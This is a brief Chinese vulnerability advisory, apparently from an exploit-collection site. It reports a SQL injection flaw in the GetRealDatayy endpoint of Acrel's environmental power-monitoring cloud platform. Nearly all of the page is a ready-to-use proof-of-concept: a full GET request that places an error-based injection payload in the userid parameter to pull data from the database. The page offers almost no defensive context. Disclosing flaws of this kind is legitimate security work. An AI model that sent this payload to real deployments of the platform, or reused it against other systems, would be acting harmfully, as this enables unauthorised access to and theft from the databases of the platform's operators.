安科瑞环保用电监管云平台 GetRealDatayy 存在SQL注入

日期: 2025-09-01 | 影响软件: 安科瑞环保用电监管云平台 | POC: 已公开

漏洞描述

安科瑞环保用电监管云平台 GetRealDatayy 存在SQL注入漏洞,攻击者可构造恶意请求获取数据库敏感信息。

PoC代码

GET /MainMonitor/GetRealDatayy?userid='%20AND%20GTID_SUBSET(CONCAT(0x7162717071,(SELECT%20(ELT(4889=4889,1))),0x7171786b71),4889)--%20hnzj HTTP/1.1

相关漏洞推荐